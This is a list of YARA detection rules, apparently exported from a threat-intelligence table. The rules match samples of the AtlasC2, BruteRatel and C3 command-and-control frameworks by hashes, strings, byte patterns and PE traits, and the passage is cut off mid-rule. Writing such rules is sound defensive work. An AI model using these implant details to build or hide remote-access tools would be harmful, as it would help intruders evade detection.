Details	Yara rule	1	import "pe" import "hash" rule AtlasC2_Implant { meta: description = "AtlasC2 - Implant.exe" sha256 = "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09" strings: $s1 = "Implant.Tasks.Execute" ascii fullword $s2 = "Implant.exe" wide fullword $s3 = "ExecuteAssemMethod" wide fullword $s4 = "ExecuteAssem" wide fullword $s5 = "ExecuteAssemEP" ascii fullword $s6 = " loaded into implant process" wide fullword $s7 = "(Implant.Models.HTTPComms+<PostData>d__18" ascii fullword $s8 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s9 = "<targetDir>k__BackingField" ascii fullword $s10 = "get_targetFile" ascii fullword $s11 = "set_targetDir" ascii fullword $s12 = "<targetFile>k__BackingField" ascii fullword $s13 = "get_targetDir" ascii fullword $s14 = "set_targetFile" ascii fullword $s15 = "GetHostIP" ascii fullword $s16 = "<targetPath>k__BackingField" ascii fullword $s17 = "get_Encoded" ascii fullword $s18 = "set_targetPath" ascii fullword $s19 = "ImplantCommands" ascii fullword $s20 = "set_UseShellExecute" ascii fullword condition: hash.sha256(0, filesize) == "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09" or pe.characteristics & pe.EXECUTABLE_IMAGE and uint16(0) == 0x5a4d and filesize < 100KB and 8 of them }
Details	Yara rule	1	import "pe" import "hash" rule AtlasC2_Client { meta: description = "AtlasC2 - Client.exe" sha256 = "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b" strings: $s1 = "hostfxr.dll" wide fullword $s2 = "--- Invoked %s [version: %s, commit hash: %s] main = {" wide fullword $s3 = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" wide fullword $s4 = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\standalone\\Release\\apphost.pdb" ascii fullword $s5 = "Client.dll" wide fullword $s6 = " - %s&apphost_version=%s" wide fullword $s7 = "The managed DLL bound to this executable is: '%s'" wide fullword $s8 = "A fatal error was encountered. This executable was not bound to load a managed DLL." wide fullword $s9 = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s'" wide fullword $s10 = "Failed to resolve full path of the current executable [%s]" wide fullword $s11 = "https://go.microsoft.com/fwlink/?linkid=798306" wide fullword $s12 = "The managed DLL bound to this executable could not be retrieved from the executable image." wide fullword $s13 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s14 = " - Installing .NET prerequisites might help resolve this problem." wide fullword $s15 = " - https://aka.ms/dotnet-core-applaunch?" wide fullword $s16 = "Failed to load the dll from [%s], HRESULT: 0x%X" wide fullword $s17 = "The required library %s does not support relative app dll paths." wide fullword $s18 = "Failed to read environment variable [%s], HRESULT: 0x%X" wide fullword $s19 = "The application to execute does not exist: '%s'." wide fullword $s20 = "apphost" wide fullword condition: hash.sha256(0, filesize) == "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b" or pe.characteristics & pe.EXECUTABLE_IMAGE and uint16(0) == 0x5a4d and filesize < 400KB and 8 of them }
Details	Yara rule	1	import "hash" import "pe" import "math" rule BruteRatel_BadgerDll_x64 { meta: description = "BruteRatel - badger_x64.dll" sha256_1 = "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307" sha256_2 = "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e" strings: $s1 = "HK2PVH1A.dll" ascii fullword $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s4 = "$K~D:\\" ascii fullword $s5 = " VirtualProtect failed with code 0x%x" ascii fullword $s6 = "^CN:\\Z" ascii fullword $s7 = "AYAXZYPAQH" ascii fullword $s8 = "AWAVAUATM" ascii fullword $s9 = " Unknown pseudo relocation protocol version %d." ascii fullword $s10 = " -9.6p" ascii fullword $s11 = "fv* VE" ascii fullword $s12 = "> /Mq/" ascii fullword $s13 = "ygfL,.'" ascii fullword $s14 = "POIOWiAu" ascii fullword $s15 = "^(d{f>v AXQRAPAQL" ascii fullword $s16 = "GxnyNxL" ascii fullword $s17 = "UQAi1qv" ascii fullword $s18 = "tJmyU}1" ascii fullword $s19 = "!qtel-oT" ascii fullword $s20 = "QRDJB2Q" ascii fullword $s21 = "C3OQGC2D.dll" ascii fullword $s22 = "AYAXZYPAQH" ascii fullword condition: hash.sha256(0, filesize) == "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307" or hash.sha256(0, filesize) == "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e" or math.entropy(0, filesize) >= 7 and pe.imports("kernel32.dll", "VirtualProtect") and pe.characteristics & pe.DLL and uint16(0) == 0x5a4d and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "math" import "hash" rule BruteRatel_BadgerBin_x64_RtlExitUserThread { meta: description = "BruteRatel - badger_x64_RtlExitUserThread.bin" sha256_1 = "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8" sha256_2 = "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583" strings: $s1 = "AYAXZYPAQH" ascii fullword $s2 = "AWAVAUATM" ascii fullword $s3 = "tpGb#_," ascii fullword $s4 = "OEvy[)q" ascii fullword $s5 = "pmiSTvdy" ascii fullword $s6 = "TaLcDw;lI" ascii fullword $s7 = "MrVeO[9" ascii fullword $s8 = "WUtEFwQX" ascii fullword $s9 = "9WVZeLFi" ascii fullword $s10 = "eIvV0h+" ascii fullword $s11 = "zllG!r" ascii fullword $s12 = "mZnFr_." ascii fullword $s13 = "sLIv9`0T" ascii fullword $s14 = "$vufz?" ascii fullword $s15 = "Q5/}@}ud%AXQRAPAQL" ascii fullword $s16 = "AWAVAUATWVH" ascii fullword $s17 = "oaNpx3" ascii fullword $s18 = "\\0X/pa" ascii fullword $s19 = "VfaFB0" ascii fullword $s20 = "\\x(BEI" ascii fullword $s21 = "ZgaoJ,9" ascii fullword $s22 = "IpKSfvlR" ascii fullword $s23 = "d%>d$/:iAXQRAPAQL" ascii fullword $s24 = "/Yesbu/6" ascii fullword $s25 = "teXrmE<" ascii fullword condition: hash.sha256(0, filesize) == "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8" or hash.sha256(0, filesize) == "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583" or math.entropy(0, filesize) >= 7 and uint16(0) == 0x8348 and filesize < 700KB and 6 of them }
Details	Yara rule	1	import "pe" import "math" import "hash" rule BruteRatel_BadgerService_x64 { meta: description = "BruteRatel - badger_x64_service.exe" sha256_1 = "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8" sha256_2 = "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154" strings: $s1 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s4 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" $s5 = " VirtualProtect failed with code 0x%x" ascii fullword $s6 = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." ascii fullword $s7 = "TransactionBrokerService" ascii fullword $s8 = "AYAXZYPAQH" ascii fullword $s9 = "AWAVAUATM" ascii fullword $s10 = " Unknown pseudo relocation protocol version %d." ascii fullword $s11 = "\\BeiSp /" ascii fullword $s12 = "BZ' -aH" ascii fullword $s13 = ">qP'4- J>" ascii fullword $s14 = ":MZuWHcB<H" ascii fullword $s15 = "JNacN'j" ascii fullword $s16 = "'BYMX?k" ascii fullword $s17 = "!FruL1ZLWlM9" ascii fullword $s18 = "oRvNu7I" ascii fullword $s19 = "oqd!a #saAXQRAPAQL" ascii fullword $s20 = "c-QVpl*bUM" ascii fullword condition: hash.sha256(0, filesize) == "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8" or hash.sha256(0, filesize) == "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154" or math.entropy(0, filesize) >= 7 and pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("advapi32.dll", "ChangeServiceConfig2A") and pe.imports("advapi32.dll", "ChangeServiceConfigA") and pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and pe.characteristics & pe.EXECUTABLE_IMAGE and uint16(0) == 0x5a4d and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "math" import "hash" rule BruteRatel_BadgerStealthBin_x64_RtlExitUserThread { meta: description = "BruteRatel - badger_x64_stealth_RtlExitUserThread.bin" sha256_1 = "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c" sha256_2 = "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324" strings: $s1 = "AYAXZYPAQH" ascii fullword $s2 = "AWAVAUATM" ascii fullword $s3 = "AWAVAUM" ascii fullword $s4 = "bhfSv!6" ascii fullword $s5 = "VrdJrcU" ascii fullword $s6 = "tXRC4DCWt" ascii fullword $s7 = "6rhfN^4qyW" ascii fullword $s8 = "kejA\"'" ascii fullword $s9 = "LgVSX[4>" ascii fullword $s10 = "CXaAb4D6" ascii fullword $s11 = "XjXxiQ?" ascii fullword $s12 = "MOpm~vr" ascii fullword $s13 = "mmq&e$ddAXQRAPAQL" ascii fullword $s14 = "Jiysu^[r" ascii fullword $s15 = "_(t.oGR" ascii fullword $s16 = "tKTU7!2" ascii fullword $s17 = "xUdcmD" ascii fullword $s18 = "\|owVVk)DK" ascii fullword $s19 = "EtPevsx" ascii fullword $s20 = "samgQ\"" ascii fullword $s21 = ".sWP&\|" ascii fullword $s22 = "\"(hvLZ\\wE" ascii fullword $s23 = ",.MMgQ)y<" ascii fullword $s24 = "+ l%(U^u" ascii fullword $s25 = "SxjTLZ2" ascii fullword $s26 = "OJQx>$-=" ascii fullword $s27 = "\|JXPC}5Q" ascii fullword condition: hash.sha256(0, filesize) == "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c" or hash.sha256(0, filesize) == "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324" or math.entropy(0, filesize) >= 7 and uint16(0) == 0x8348 and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "pe" import "math" import "hash" rule BruteRatel_BadgerStealthService_x64 { meta: description = "BruteRatel - badger_x64_stealth_service.exe" sha256 = "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce" strings: $s1 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s4 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" $s5 = "pggmopa" ascii fullword $s6 = " VirtualProtect failed with code 0x%x" ascii fullword $s7 = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." ascii fullword $s8 = "TransactionBrokerService" ascii fullword $s9 = "AYAXZYPAQH" ascii fullword $s10 = "AWAVAUATM" ascii fullword $s11 = "AWAVAUM" ascii fullword $s12 = " Unknown pseudo relocation protocol version %d." ascii fullword $s13 = "p62%q%" ascii fullword $s14 = "yqfgcr0" ascii fullword $s15 = ":MZuWHcB<H" ascii fullword $s16 = "V_XgIY!*" ascii fullword $s17 = "chPcT0X" ascii fullword $s18 = "kVea&{(" ascii fullword $s19 = "R?vnooO]L" ascii fullword $s20 = "rQPx[,D" ascii fullword condition: hash.sha256(0, filesize) == "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce" or math.entropy(0, filesize) >= 7 and pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("advapi32.dll", "ChangeServiceConfig2A") and pe.imports("advapi32.dll", "ChangeServiceConfigA") and pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and pe.characteristics & pe.EXECUTABLE_IMAGE and uint16(0) == 0x5a4d and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "math" import "hash" rule BruteRatel_BadgerStealthBin_x64_WaitForSingleObject { meta: description = "BruteRatel - badger_x64_stealth_WaitForSingleObject.bin" sha256_1 = "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c" sha256_2 = "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df" strings: $s1 = "-},p:\\" ascii fullword $s2 = "AYAXZYPAQH" ascii fullword $s3 = "AWAVAUATM" ascii fullword $s4 = "AWAVAUM" ascii fullword $s5 = "\\o /No" ascii fullword $s6 = "mRCBh0e" ascii fullword $s7 = "iIHGF\\(" ascii fullword $s8 = "@$$)#\|v}AXQRAPAQL" ascii fullword $s9 = "QaLb5+y" ascii fullword $s10 = "DsWN8F\\L" ascii fullword $s11 = "EscU,yQPaeB" ascii fullword $s12 = "\|XRTiqS{" ascii fullword $s13 = "MXxG)]q" ascii fullword $s14 = "zesf!ub" ascii fullword $s15 = "_riizb_6" ascii fullword $s16 = "BABqh\\" ascii fullword $s17 = "xFMD@CH" ascii fullword $s18 = "eAtA_b-" ascii fullword $s19 = "R$.Naq" ascii fullword $s20 = "gQId?99<" ascii fullword $s21 = "N!^ /O" ascii fullword $s22 = "AqckaG(c" ascii fullword $s23 = "=ESzR=LH" ascii fullword $s24 = "50szmET\|E" ascii fullword $s25 = "}- 0I$e" ascii fullword condition: hash.sha256(0, filesize) == "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c" or hash.sha256(0, filesize) == "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df" or math.entropy(0, filesize) >= 7 and uint16(0) == 0x8348 and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "math" import "hash" rule BruteRatel_BadgerBin_x64_WaitForSingleObject { meta: description = "BruteRatel - badger_x64_WaitForSingleObject.bin" sha256_1 = "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666" sha256_2 = "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c" strings: $s1 = "AYAXZYPAQH" ascii fullword $s2 = "AWAVAUATM" ascii fullword $s3 = "&.fm#a:dAXQRAPAQL" ascii fullword $s4 = "~AZV_gPPs&fZv" ascii fullword $s5 = "OrDnmSl" ascii fullword $s6 = "Onnn\"-" ascii fullword $s7 = "xDAX!X" ascii fullword $s8 = "RWaBcGu" ascii fullword $s9 = "1zpfd?" ascii fullword $s10 = "vUdc7TN" ascii fullword $s11 = "vQkR~oN' " ascii fullword $s12 = "x/sGxaW'O" ascii fullword $s13 = "tNwRf-'" ascii fullword $s14 = "fQBS\"W" ascii fullword $s15 = "LTEU0AA" ascii fullword $s16 = "s-.RBA@K" ascii fullword $s17 = "Gwsl\\U:p" ascii fullword $s18 = "75.yHG" ascii fullword $s19 = "SAHW&Nm" ascii fullword $s20 = "+uCLL't~Y_$(iW" ascii fullword $s21 = ";=%i3ta" ascii fullword $s22 = "X>,%S3x" ascii fullword $s23 = "hVIz)0a" ascii fullword $s24 = "uWrB~MBvi=" ascii fullword $s25 = "aAkXv&Z" ascii fullword $s27 = "EnZl5%" ascii fullword $s28 = "wsbnuob%" ascii fullword condition: hash.sha256(0, filesize) == "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666" or hash.sha256(0, filesize) == "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c" or math.entropy(0, filesize) >= 7 and uint16(0) == 0x8348 and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "pe" import "math" import "hash" rule BruteRatel_BadgerDll_x86 { meta: description = "BruteRatel - badger_x86.dll" sha256_1 = "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac" sha256_2 = "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278" strings: $s1 = "F5M5INBS.dll" ascii fullword $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s4 = "4!535?5f5{5" ascii fullword $s5 = " VirtualProtect failed with code 0x%x" ascii fullword $s6 = "cH:\"+SY" ascii fullword $s7 = " Unknown pseudo relocation protocol version %d." ascii fullword $s8 = "TaNnOhb" ascii fullword $s9 = ")warvr6f" ascii fullword $s10 = "3;WiFF!S" ascii fullword $s11 = "VMbw`iC)" ascii fullword $s12 = "HvbS29@~\\A" ascii fullword $s13 = "WkCox*V%" ascii fullword $s14 = "WbkiPR%" ascii fullword $s15 = "ywTl=lQu" ascii fullword $s16 = "RCyDgt/" ascii fullword $s17 = "_SGimRpH" ascii fullword $s18 = "Gypy?#W" ascii fullword $s19 = "rKNW\\$D" ascii fullword $s20 = "QGTZx.\"" ascii fullword $s21 = "/ird_%k%vy?" ascii fullword $s22 = "zbMDO01" ascii fullword $s23 = "]Xbych4o" ascii fullword $s24 = "TNUu!E <" ascii fullword $s25 = "vSpZ3A3" ascii fullword $s26 = "stXi}G<" ascii fullword $s27 = "gkms\\#" ascii fullword $s28 = "V\\bhaV!" ascii fullword $s29 = "ZrJqHBf`" ascii fullword condition: hash.sha256(0, filesize) == "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac" or hash.sha256(0, filesize) == "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278" or math.entropy(0, filesize) >= 7 and pe.imports("kernel32.dll", "GetNativeSystemInfo") and pe.imports("kernel32.dll", "VirtualProtect") and pe.characteristics & pe.DLL and uint16(0) == 0x5a4d and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "math" import "hash" rule BruteRatel_BadgerBin_x86_RtlExitUserThread { meta: description = "BruteRatel - badger_x86_RtlExitUserThread.bin" sha256_1 = "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9" sha256_2 = "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511" strings: $s1 = "QT^%U%" ascii fullword $s2 = "nrWLO0J" ascii fullword $s3 = "RnPvIe_s" ascii fullword $s4 = "aHOcIO0A" ascii fullword $s5 = "hIHj\\4" ascii fullword $s6 = "TPfI/BA" ascii fullword $s7 = "XzJz\"D" ascii fullword $s8 = "wUjnc\\" ascii fullword $s9 = "yIaAkD{u" ascii fullword $s10 = "UtBn_(U&" ascii fullword $s11 = "uMeUH}Wc;" ascii fullword $s12 = "xRTPi\\" ascii fullword $s13 = "1OUhr!!" ascii fullword $s14 = "uNrKkND;" ascii fullword $s15 = "Lxua?iD" ascii fullword $s16 = "rWWKd2Vi" ascii fullword $s17 = "5pvQWR4*" ascii fullword $s18 = "NgyeM?" ascii fullword $s19 = "]xlxA?" ascii fullword $s20 = "UEfP<yP" ascii fullword $s21 = "- c7;;" ascii fullword $s22 = "2%Bm%0" ascii fullword $s23 = "P63%]%i~" ascii fullword $s24 = "zYvxRjs" ascii fullword $s25 = "zhCse%y" ascii fullword $s26 = "Ijlb^Ps" ascii fullword $s27 = "inYh~q0C" ascii fullword $s28 = "raigP]`" ascii fullword $s29 = "oIKjIr;_\|" ascii fullword condition: hash.sha256(0, filesize) == "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9" or hash.sha256(0, filesize) == "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511" or math.entropy(0, filesize) >= 7 and uint16(0) == 0xe483 and filesize < 600KB and 8 of them }
Details	Yara rule	1	import "pe" import "math" import "hash" rule BruteRatel_BadgerService_x86 { meta: description = "BruteRatel - badger_x86_service.exe" sha256_1 = "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc" sha256_2 = "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4" strings: $s1 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s4 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" $s5 = " VirtualProtect failed with code 0x%x" ascii fullword $s6 = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." ascii fullword $s7 = "TransactionBrokerService" ascii fullword $s8 = " Unknown pseudo relocation protocol version %d." ascii fullword $s9 = "'tSAc?" ascii fullword $s10 = "adME<2B" ascii fullword $s11 = "EtWnPlR@" ascii fullword $s12 = "xA]%d$" ascii fullword $s13 = "bTIlD:L" ascii fullword $s14 = "eldi.#]" ascii fullword $s15 = "wglk!@" ascii fullword $s16 = "WLiFq:" ascii fullword $s17 = "YypyU`C" ascii fullword $s18 = ")lXxY\| 2" ascii fullword $s19 = "ODVYo{# #" ascii fullword $s20 = "qWTLG$i" ascii fullword $s21 = "}%EP%VJ\|D" ascii fullword $s22 = "wOCo*.\|j\\" ascii fullword condition: hash.sha256(0, filesize) == "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc" or hash.sha256(0, filesize) == "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4" or math.entropy(0, filesize) >= 7 and pe.imports("kernel32.dll", "GetNativeSystemInfo") and pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("advapi32.dll", "ChangeServiceConfig2A") and pe.imports("advapi32.dll", "ChangeServiceConfigA") and pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and pe.characteristics & pe.EXECUTABLE_IMAGE and uint16(0) == 0x5a4d and filesize < 700KB and 8 of them }
Details	Yara rule	1	import "math" import "hash" rule BruteRatel_BadgerBin_x86_WaitForSingleObject { meta: description = "BruteRatel - badger_x86_WaitForSingleObject.bin" sha256_1 = "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7" sha256_2 = "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1" strings: $s1 = "u.Scg$]" ascii fullword $s2 = "VeUye?^(" ascii fullword $s3 = "vlHSYN;" ascii fullword $s4 = "VcOmK{" ascii fullword $s5 = "vKUEFs&" ascii fullword $s6 = "{wBwW6)h" ascii fullword $s7 = "RfCI\"C" ascii fullword $s8 = "XJ\"iFHoMUme6" ascii fullword $s9 = "vFarpxD" ascii fullword $s10 = "MvNt,OG@" ascii fullword $s11 = "DVQhcvq6 (" ascii fullword $s12 = "PsBWhs+" ascii fullword $s13 = "wU.FbR" ascii fullword $s14 = "rhTBPuq." ascii fullword $s15 = "mZatBjy" ascii fullword $s16 = ";Nzfpr:AP" ascii fullword $s17 = "%.Enb{$" ascii fullword $s18 = "lXLrko/dVtQ7" ascii fullword $s19 = ":(7.TNH" ascii fullword $s20 = "KXny@10" ascii fullword $s21 = "{Oc.qfy^" ascii fullword $s22 = "bqFBo$\\l)" ascii fullword $s23 = "SrtTo\"W=" ascii fullword $s24 = "ECNRNIMpWE" ascii fullword $s25 = "a{ZNYW75:;z" ascii fullword $s26 = "jwsW\\_6U" ascii fullword $s27 = "HdXdw]m!" ascii fullword $s28 = "@WBvXXJ?" ascii fullword condition: hash.sha256(0, filesize) == "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7" or hash.sha256(0, filesize) == "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1" or math.entropy(0, filesize) >= 7 and uint16(0) == 0xe483 and filesize < 600KB and 8 of them }
Details	Yara rule	1	import "hash" rule BruteRatel_SyscallStageBin_x64_RtlExitUserThread { meta: description = "BruteRatel - syscall_stage_x64_RtlExitUserThread.bin" sha256 = "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca" strings: $s1 = ":{\"auth\"L" ascii fullword $s2 = "AWAVAUATM" ascii fullword $s3 = "AWAVAUM" ascii fullword $s4 = "AWAVAUATI" ascii fullword $s5 = "{\"arch\":UH" ascii fullword $s6 = "AUATE1" ascii fullword $s7 = "PMch<H" ascii fullword $s8 = "McT$<L" ascii fullword $s9 = "64,\"cds\"H" ascii fullword $s10 = "n.\\d}#l$YH" ascii fullword $s11 = { 55 48 89 E5 41 57 41 56 41 55 41 54 4D 89 C4 57 } $s12 = { 55 48 89 E5 41 57 41 56 41 55 4D 89 C5 41 54 57 } $s13 = { 55 48 89 E5 57 56 53 48 89 CB 48 83 E4 F0 48 81 } $s14 = { 55 48 89 E5 41 57 41 56 41 55 41 54 49 89 D4 BA } $s15 = { 55 48 89 E5 41 55 41 54 57 56 53 48 83 E4 F0 48 } condition: hash.sha256(0, filesize) == "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca" or uint16(0) == 0x8348 and filesize < 30KB and all of them }
Details	Yara rule	1	import "hash" rule BruteRatel_SyscallStageBin_x64_WaitForSingleObject { meta: description = "BruteRatel - syscall_stage_x64_WaitForSingleObject.bin" sha256 = "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384" strings: $s1 = ":{\"auth\"L" ascii fullword $s2 = "AWAVAUATM" ascii fullword $s3 = "AWAVAUM" ascii fullword $s4 = "AWAVAUATI" ascii fullword $s5 = "{\"arch\":UH" ascii fullword $s6 = "AUATE1" ascii fullword $s7 = "PMch<H" ascii fullword $s8 = "McT$<L" ascii fullword $s9 = "64,\"cds\"H" ascii fullword $s10 = "n.\\d}#l$YH" ascii fullword $s11 = { 55 48 89 E5 41 57 41 56 41 55 41 54 4D 89 C4 57 } $s12 = { 55 48 89 E5 41 57 41 56 41 55 4D 89 C5 41 54 57 } $s13 = { 55 48 89 E5 57 56 53 48 89 CB 48 83 E4 F0 48 81 } $s14 = { 55 48 89 E5 41 57 41 56 41 55 41 54 49 89 D4 BA } $s15 = { 55 48 89 E5 41 55 41 54 57 56 53 48 83 E4 F0 48 } condition: hash.sha256(0, filesize) == "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384" or uint16(0) == 0x8348 and filesize < 30KB and all of them }
Details	Yara rule	1	import "hash" rule BruteRatel_SyscallStageBin_x86_RtlExitUserThread { meta: description = "BruteRatel - syscall_stage_x86_RtlExitUserThread.bin" sha256 = "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9" strings: $s1 = "D$`POST" ascii fullword $s2 = "@h$p<pu" ascii fullword $s3 = "D$ich\":" ascii fullword $s4 = "D$yuth\"" ascii fullword $s5 = "D$m86,\"" ascii fullword $s6 = "D$e{\"ar" ascii fullword $s7 = "D$\\\"}}" ascii fullword $s8 = "D$u:{\"a" ascii fullword $s9 = "D$qcds\"" ascii fullword $s10 = "n.\\d}#l$YRQ" ascii fullword $s11 = { 55 8B 7C 24 58 03 3B 89 3C 24 E8 97 04 00 00 3B } condition: hash.sha256(0, filesize) == "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9" or uint16(0) == 0xe483 and filesize < 20KB and all of them }
Details	Yara rule	1	import "hash" rule BruteRatel_SyscallStageBin_x86_WaitForSingleObject { meta: description = "BruteRatel - syscall_stage_x86_WaitForSingleObject.bin" sha256 = "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31" strings: $s1 = "D$`POST" ascii fullword $s2 = "@h$p<pu" ascii fullword $s3 = "D$ich\":" ascii fullword $s4 = "D$yuth\"" ascii fullword $s5 = "D$m86,\"" ascii fullword $s6 = "D$e{\"ar" ascii fullword $s7 = "D$\\\"}}" ascii fullword $s8 = "D$u:{\"a" ascii fullword $s9 = "D$qcds\"" ascii fullword $s10 = "n.\\d}#l$YRQ" ascii fullword $s11 = { 55 8B 7C 24 58 03 3B 89 3C 24 E8 97 04 00 00 3B } condition: hash.sha256(0, filesize) == "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31" or uint16(0) == 0xe483 and filesize < 20KB and all of them }
Details	Yara rule	1	import "hash" import "pe" rule C3 { meta: description = "C3 - NodeRelayDll_r64.dll, NodeRelayDll_r86.dll" sha256_1 = "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008" sha256_2 = "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625" strings: $s1 = "api-ms-win-core-synch-l1-2-0.dll" wide fullword $s2 = "AppPolicyGetProcessTerminationMethod" ascii fullword $s3 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword $s4 = "[x] error creating Token" ascii fullword $s5 = "[x] error setting token" ascii fullword $s6 = "AppPolicyGetThreadInitializationType" ascii fullword $s7 = "invalid vector subscript" ascii fullword $s8 = " Type Descriptor'" ascii fullword $s9 = ".?AVfilesystem_error@filesystem@std@@" ascii fullword $s10 = "[x] error duplicating token" ascii fullword $s11 = "directory_iterator::operator++" ascii fullword $s12 = "syntax error " ascii fullword $s13 = "operator co_await" ascii fullword $s14 = "object key" ascii fullword $s15 = "operator<=>" ascii fullword $s16 = ".data$rs" ascii fullword $s17 = "sysrandom" ascii fullword $s18 = "parse error: character [" ascii fullword $s19 = "X-Atlassian-Token" ascii fullword $s20 = ".?AVparse_error@detail@nlohmann@@" ascii fullword condition: hash.sha256(0, 